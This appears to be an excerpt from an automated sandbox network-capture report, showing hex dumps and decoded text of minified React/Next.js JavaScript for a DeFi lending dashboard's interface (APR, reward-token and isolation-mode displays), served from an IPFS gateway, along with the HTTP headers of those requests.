                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 73 78 3a 7b 6d 69 6e 57 69 64 74 68 3a 22 75 6e 73 65 74 22 2c 6d 6c 3a 7b 78 73 3a 30 2c 78 73 6d 3a 32 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6d 2e 6a 73 78 29 28 69 2e 63 43 2c 7b 69 64 3a 22 52 69 73 6b 20 64 65 74 61 69 6c 73 22 7d 29 7d 29 2c 74 26 26 28 30 2c 6d 2e 6a 73 78 29 28 63 2e 5a 2c 7b 6d 6c 3a 7b 78 73 3a 30 2c 78 73 6d 3a 32 7d 2c 6d 74 3a 7b 78 73 3a 31 2c 78 73 6d 3a 30 7d 2c 63 68 69 6c 64 72 65 6e 3a 74 7d 29 5d 7d 29 7d 7d 2c 31 32 33 34 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6e 29 7b 6e 2e 64 28 72 2c 7b 4d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6a 7d 7d 29 3b 76 61 72 20 74 3d 6e 28 31 32 37 39 29 2c 6f 3d 6e 28 38 30 30 35 39 29 2c 69 3d 6e 28 33 30 31 32 30 29 2c 73 3d 6e 28 32 39 36 33 30 29 2c 61
                                                                                                                                                                                                                                                  Data Ascii: sx:{minWidth:"unset",ml:{xs:0,xsm:2}},children:(0,m.jsx)(i.cC,{id:"Risk details"})}),t&&(0,m.jsx)(c.Z,{ml:{xs:0,xsm:2},mt:{xs:1,xsm:0},children:t})]})}},12349:function(e,r,n){n.d(r,{M:function(){return j}});var t=n(1279),o=n(80059),i=n(30120),s=n(29630),a
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 5b 28 30 2c 68 2e 6a 73 78 29 28 6d 2e 54 31 2c 7b 73 79 6d 62 6f 6c 3a 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 53 79 6d 62 6f 6c 2c 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 32 30 70 78 22 2c 6d 72 3a 31 7d 7d 29 2c 28 30 2c 68 2e 6a 73 78 29 28 73 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 6f 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 53 79 6d 62 6f 6c 7d 29 5d 7d 29 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 68 2e 6a 73 78 29 28 61 2c 7b 69 6e 63 65 6e 74 69 76 65 41 50 52 3a 65 2e 69 6e 63 65 6e 74 69 76 65 41 50 52 7d 29 7d 2c 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 41 64 64 72 65 73 73 29 7d 29 29 2c 72 2e 6c 65 6e 67 74 68 3e 31 26 26 28 30 2c 68 2e 6a 73 78 29 28 69 2e 5a 2c 7b 73 78 3a 66 75 6e
                                                                                                                                                                                                                                                  Data Ascii: [(0,h.jsx)(m.T1,{symbol:e.rewardTokenSymbol,sx:{fontSize:"20px",mr:1}}),(0,h.jsx)(s.Z,{variant:o,children:e.rewardTokenSymbol})]}),width:"100%",children:(0,h.jsx)(a,{incentiveAPR:e.incentiveAPR})},e.rewardTokenAddress)})),r.length>1&&(0,h.jsx)(i.Z,{sx:fun
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 64 65 72 29 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 63 75 72 73 6f 72 3a 22 70 6f 69 6e 74 65 72 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 74 72 61 6e 73 69 74 69 6f 6e 3a 22 6f 70 61 63 69 74 79 20 30 2e 32 73 20 65 61 73 65 22 2c 62 67 63 6f 6c 6f 72 3a 6a 3f 22 61 63 74 69 6f 6e 2e 68 6f 76 65 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 62 67 63 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 68 6f 76 65 72 22 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 22 7d 7d 7d 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                                  Data Ascii: der),borderRadius:"4px",cursor:"pointer",display:"flex",alignItems:"center",justifyContent:"center",transition:"opacity 0.2s ease",bgcolor:j?"action.hover":"transparent","&:hover":{bgcolor:"action.hover",borderColor:"action.disabled"}}},onClick:function()
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 72 20 74 3d 6e 28 35 39 34 39 39 29 2c 6f 3d 6e 28 34 39 35 30 31 29 2c 69 3d 6e 28 33 38 32 36 34 29 2c 73 3d 6e 28 38 31 36 34 35 29 2c 61 3d 6e 28 36 32 30 39 37 29 2c 63 3d 6e 28 33 30 31 32 30 29 2c 6c 3d 6e 28 32 39 36 33 30 29 2c 64 3d 6e 28 36 38 33 34 36 29 2c 75 3d 6e 28 39 37 35 36 33 29 2c 70 3d 6e 28 38 35 38 39 33 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 74 3d 74 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                  Data Ascii: r t=n(59499),o=n(49501),i=n(38264),s=n(81645),a=n(62097),c=n(30120),l=n(29630),d=n(68346),u=n(97563),p=n(85893);function m(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);r&&(t=t.filter((function(r){return
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 65 69 67 68 74 3a 22 30 2e 37 35 72 65 6d 22 7d 2c 63 6f 6c 6f 72 3a 6e 2e 70 61 6c 65 74 74 65 2e 77 61 72 6e 69 6e 67 2e 6d 61 69 6e 7d 2c 72 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 70 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 49 73 6f 6c 61 74 65 64 22 7d 29 7d 29 29 2c 28 30 2c 70 2e 6a 73 78 29 28 68 2c 7b 63 6f 6c 6f 72 3a 6e 2e 70 61 6c 65 74 74 65 2e 77 61 72 6e 69 6e 67 2e 6d 61 69 6e 7d 29 5d 7d 29 7d 29 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 70 2e 6a 73 78 29 28 75 2e 61 2c 7b 74 6f 6f 6c 74 69 70 43 6f 6e 74 65 6e 74 3a 28 30 2c 70 2e 6a 73 78 29 28 79 2c 7b 63 6f 6e 74 65 6e 74 3a 28 30 2c 70 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 41 73 73 65 74 20 63 61 6e 20 62 65 20 6f 6e 6c 79
                                                                                                                                                                                                                                                  Data Ascii: eight:"0.75rem"},color:n.palette.warning.main},r),{},{children:(0,p.jsx)(o.cC,{id:"Isolated"})})),(0,p.jsx)(h,{color:n.palette.warning.main})]})})},b=function(){return(0,p.jsx)(u.a,{tooltipContent:(0,p.jsx)(y,{content:(0,p.jsx)(o.cC,{id:"Asset can be only


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  64192.168.2.549785209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC504OUTGET /_next/static/chunks/9189.3b39e44e1e1f285d.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:45 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 15040
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidqmpvwz36gxygbrcsopgnb6u6p5k6xlgdsscnxezizjdmxb3kbzi"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/9189.3b39e44e1e1f285d.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreidqmpvwz36gxygbrcsopgnb6u6p5k6xlgdsscnxezizjdmxb3kbzi
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028479
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 61 66 39 38 35 38 63 35 66 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42af9858c5f-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 31 38 39 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 72 3d 74 28 36 34 38 33 36 29 3b 6e 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 72 28 74 28 36 34 39 33 38 29 29 2c 69 3d 74 28 38 35 38 39 33 29 2c 73 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 69 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9189],{62753:function(e,n,t){var r=t(64836);n.Z=void 0;var o=r(t(64938)),i=t(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 6d 22 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 2c 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 2c 66 6c 65 78 53 68 72 69 6e 6b 3a 30 2c 66 6f 6e 74 53 69 7a 65 3a 7b 69 6e 68 65 72 69 74 3a 22 69 6e 68 65 72 69 74 22 2c 73 6d 61 6c 6c 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 30 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 6e 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d
                                                                                                                                                                                                                                                  Data Ascii: m",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[n.fontSize],color:{primary:(e.vars||e).palette.primary.m
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 41 72 72 61 79 28 65 29 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 3b 72 65 74 75 72 6e 20 74 2e 72 65 64 75 63 65 28 28 28 65 2c 72 2c 6f 29 3d 3e 28 65 2e 70 75 73 68 28 72 29 2c 6f 3c 74 2e 6c 65 6e 67 74 68 2d 31 26 26 65 2e 70 75 73 68 28 69 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 6e 2c 7b 6b 65 79 3a 60 73 65 70 61 72 61 74 6f 72 2d 24 7b 6f 7d 60 7d 29 29 2c 65 29 29 2c 5b 5d 29 7d 63 6f 6e 73 74 20 68 3d 28 30 2c 64 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 6e 29 3d 3e 5b 6e 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 6e 7d 29 3d 3e 7b 6c 65 74 20 74 3d
                                                                                                                                                                                                                                                  Data Ascii: Array(e).filter(Boolean);return t.reduce(((e,r,o)=>(e.push(r),o<t.length-1&&e.push(i.cloneElement(n,{key:`separator-${o}`})),e)),[])}const h=(0,d.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,n)=>[n.root]})((({ownerState:e,theme:n})=>{let t=
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 3d 76 7d 2c 31 32 33 34 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 64 28 6e 2c 7b 4d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 76 61 72 20 72 3d 74 28 31 32 37 39 29 2c 6f 3d 74 28 38 30 30 35 39 29 2c 69 3d 74 28 33 30 31 32 30 29 2c 73 3d 74 28 32 39 36 33 30 29 2c 61 3d 74 28 38 31 36 34 35 29 2c 63 3d 74 28 36 37 32 39 34 29 2c 6c 3d 74 28 37 38 33 37 31 29 2c 64 3d 74 28 35 37 36 30 39 29 2c 75 3d 74 28 39 37 35 36 33 29 2c 70 3d 74 28 34 31 30 32 34 29 2c 66 3d 74 28 37 32 36 36 37 29 2c 6d 3d 74 28 34 39 35 30 31 29 2c 68 3d 74 28 39 32 33 39 31 29 2c 76 3d 74 28 38 35 38 39 33 29 2c 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 69 6e 63 65 6e 74 69 76 65 73 2c 74 3d 65 2e 69 6e 63
                                                                                                                                                                                                                                                  Data Ascii: =v},12349:function(e,n,t){t.d(n,{M:function(){return b}});var r=t(1279),o=t(80059),i=t(30120),s=t(29630),a=t(81645),c=t(67294),l=t(78371),d=t(57609),u=t(97563),p=t(41024),f=t(72667),m=t(49501),h=t(92391),v=t(85893),x=function(e){var n=e.incentives,t=e.inc
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 72 65 6e 3a 28 30 2c 76 2e 6a 73 78 29 28 61 2c 7b 69 6e 63 65 6e 74 69 76 65 41 50 52 3a 65 2e 69 6e 63 65 6e 74 69 76 65 41 50 52 7d 29 7d 2c 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 41 64 64 72 65 73 73 29 7d 29 29 2c 6e 2e 6c 65 6e 67 74 68 3e 31 26 26 28 30 2c 76 2e 6a 73 78 29 28 69 2e 5a 2c 7b 73 78 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 70 74 3a 31 2c 6d 74 3a 31 2c 62 6f 72 64 65 72 3a 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 65 2e 70 61 6c 65 74 74 65 2e 64 69 76 69 64 65 72 29 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 76 2e 6a 73 78 29 28 68 2e 58 2c 7b 63 61 70 74 69 6f 6e 3a 28 30 2c 76 2e 6a 73 78 29 28 6d 2e 63 43 2c 7b 69 64 3a 22 4e 65 74 20 41 50 52 22 7d 29 2c 68 65 69 67 68 74 3a 33 32 2c 63 68
                                                                                                                                                                                                                                                  Data Ascii: ren:(0,v.jsx)(a,{incentiveAPR:e.incentiveAPR})},e.rewardTokenAddress)})),n.length>1&&(0,v.jsx)(i.Z,{sx:function(e){return{pt:1,mt:1,border:"1px solid ".concat(e.palette.divider)}},children:(0,v.jsx)(h.X,{caption:(0,v.jsx)(m.cC,{id:"Net APR"}),height:32,ch
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 68 6f 76 65 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 62 67 63 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 68 6f 76 65 72 22 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 22 7d 7d 7d 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 67 28 64 2e 68 31 2e 56 49 45 57 5f 4c 4d 5f 44 45 54 41 49 4c 53 5f 44 41 53 48 42 4f 41 52 44 2c 7b 7d 29 2c 6a 28 21 62 29 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 76 2e 6a 73 78 29 28 69 2e 5a 2c 7b 73 78 3a 7b 6d 72 3a 32 7d 2c 63 68 69 6c 64 72 65 6e 3a 22 49 6e 66 69 6e 69 74 79 22 21 3d 3d 4f 26 26 4f 3c 31 65 34 3f 28 30 2c 76 2e 6a 73 78 29 28 70 2e 42 2c 7b 76 61 6c 75 65 3a 4f 2c 70 65 72 63 65 6e 74 3a 21 30 2c 76 61 72 69
                                                                                                                                                                                                                                                  Data Ascii: hover":"transparent","&:hover":{bgcolor:"action.hover",borderColor:"action.disabled"}}},onClick:function(){g(d.h1.VIEW_LM_DETAILS_DASHBOARD,{}),j(!b)},children:[(0,v.jsx)(i.Z,{sx:{mr:2},children:"Infinity"!==O&&O<1e4?(0,v.jsx)(p.B,{value:O,percent:!0,vari
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 6e 26 26 28 72 3d 72 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 6e 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 72 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74
                                                                                                                                                                                                                                                  Data Ascii: if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);n&&(r=r.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),t.push.apply(t,r)}return t}function m(e){for(var n=1;n<arguments.length;n++){var t=null!=argument
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 30 2c 70 2e 6a 73 78 29 28 75 2e 61 2c 7b 74 6f 6f 6c 74 69 70 43 6f 6e 74 65 6e 74 3a 28 30 2c 70 2e 6a 73 78 29 28 6a 2c 7b 63 6f 6e 74 65 6e 74 3a 28 30 2c 70 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 41 73 73 65 74 20 63 61 6e 20 62 65 20 6f 6e 6c 79 20 75 73 65 64 20 61 73 20 63 6f 6c 6c 61 74 65 72 61 6c 20 69 6e 20 69 73 6f 6c 61 74 69 6f 6e 20 6d 6f 64 65 20 77 69 74 68 20 6c 69 6d 69 74 65 64 20 62 6f 72 72 6f 77 69 6e 67 20 70 6f 77 65 72 2e 20 54 6f 20 65 6e 74 65 72 20 69 73 6f 6c 61 74 69 6f 6e 20 6d 6f 64 65 2c 20 64 69 73 61 62 6c 65 20 61 6c 6c 20 6f 74 68 65 72 20 63 6f 6c 6c 61 74 65 72 61 6c 2e 22 7d 29 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 70 2e 6a 73 78 73 29 28 63
                                                                                                                                                                                                                                                  Data Ascii: =function(){return(0,p.jsx)(u.a,{tooltipContent:(0,p.jsx)(j,{content:(0,p.jsx)(o.cC,{id:"Asset can be only used as collateral in isolation mode with limited borrowing power. To enter isolation mode, disable all other collateral."})}),children:(0,p.jsxs)(c
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 6e 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 72 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3a 7b 7d 3b 6e 25 32 3f 6c 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 28 30 2c 72 2e 5a 29 28 65 2c 6e 2c 74 5b 6e 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72
                                                                                                                                                                                                                                                  Data Ascii: {return Object.getOwnPropertyDescriptor(e,n).enumerable}))),t.push.apply(t,r)}return t}function d(e){for(var n=1;n<arguments.length;n++){var t=null!=arguments[n]?arguments[n]:{};n%2?l(Object(t),!0).forEach((function(n){(0,r.Z)(e,n,t[n])})):Object.getOwnPr


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  65192.168.2.549782209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC504OUTGET /_next/static/chunks/8701.d52e3ab5e2f5c410.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:45 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 12936
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidon43grfot4tlnoe2k22heax7alfiahubllt3koun22jusvfzcqq"
